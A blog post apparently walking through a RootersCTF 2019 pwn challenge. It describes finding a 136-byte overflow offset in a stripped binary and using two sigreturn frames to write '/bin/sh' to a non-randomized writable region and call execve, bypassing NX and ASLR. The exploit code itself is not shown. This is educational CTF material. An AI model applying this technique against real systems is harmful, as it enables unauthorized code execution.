In the previous post, we are taking a look at the new approach of how we can utilize ROP without taking too much time selected the necessary gadgets using sigreturn oriented programming. But in the example, we purposely leak the stack address to help us execute mprotect function.
what if there is no leaked address? can we still bypass NX and ASLR at the same time using sigreturn?
Of course you can!
To proof it let's try to solve the pwn challenge from rooters CTF(srop). Binary can be downloaded from this link: https://github.com/abs0lut3pwn4g3/RootersCTF2019-challenges/tree/master/pwn/srop
Hmmm, it seems we get a stripped binary. This means the symbol for the function is stripped and it will be harder for us to understand the assembly.
When we run the program we can see that it only shows some prompt and expect an input after we enter some value it doesn't give us anything.
Let's load the binary to Ghidra. If you got stripped binary, the first thing that you need to do is to find the entry() function since it will contain the main function location.
from the result, we can see that inside the entry function it calls "FUN_00401000()" and you don't have to worry about the name since it comes from ghidra but all you need to know that it is actually the main function.
following the function, we can see that it contain two syscall function. Let's try to run it in gdb to deduce what is this two syscall doing. let's try to put a breakpoint at before each of the syscall
when we hit the breakpoint take a look at the registry value that will act as the parameter
we can see the value of the register that passed to the syscall is matched with the prompt that was given to us earlier so we can conclude that the first syscall is for printf whereas the syscall will be the scanf() to take our input.
Let's try to crash the program by input a long string
cool so we know that we need to provide 136 bytes to take control of the program instruction pointer. Ok, so what is the strategy? since we don't have any information leak that we can use to determine the stack address to put our shellcode in there. Remember the limitation of ASLR?
ASLR only randomizes the stack address, heap, and the dynamic library. So all we need to do is to find the other memory section within the program that is not randomize and we will use this area to stored and execute our shellcode
but where is this location you talking about?
you can list it using vmmap, notice the first three entry from the result this is the location that the ASLR does not randomize.
We can use two calls of sigframe() first one is to store "/bin/sh" value to the third entry location 0x00402000(we stored the string in this location since the permission allow to be writeable) and once it has done we create another sigframe to call execve with parameter of the location "/bin/sh" we just stored at the first sigframe.
Sounds complicated but let's try to write the code first so you can understand it.
this is the first call of the sigframe, notice that we set it to execute read() syscall and the location that we want to store is 0x402040, you can choose any location as long it's at the range of 0x00402000 - 0x00403000. I choose this location since the first few bytes at the beginning of the location is used to store initialized variable(.data), so I think the safest place will be beyond the what is list in the below result
rsp and rbp are set to make sure its big enough to store our input.
when we saved the payload and run it at the binary we can see that we managed to emulate stack to call read function.
Next, all we have to do is just store "/bin/sh\x00" string to the location and build the second the sigframe so that we can call execve so it can execute "/bin/sh"
to call execve through syscall we need to set rax register to be 59 and the first parameter(rdi) needs to be the command that we want to execute.
run the exploit and we got a shell, really cool!
That's all for today, I hope you enjoy this post
References:
https://syedfarazabrar.com/2019-10-12-rooters-ctf-pwn-challenges/#baby-pwn
Comments
Post a Comment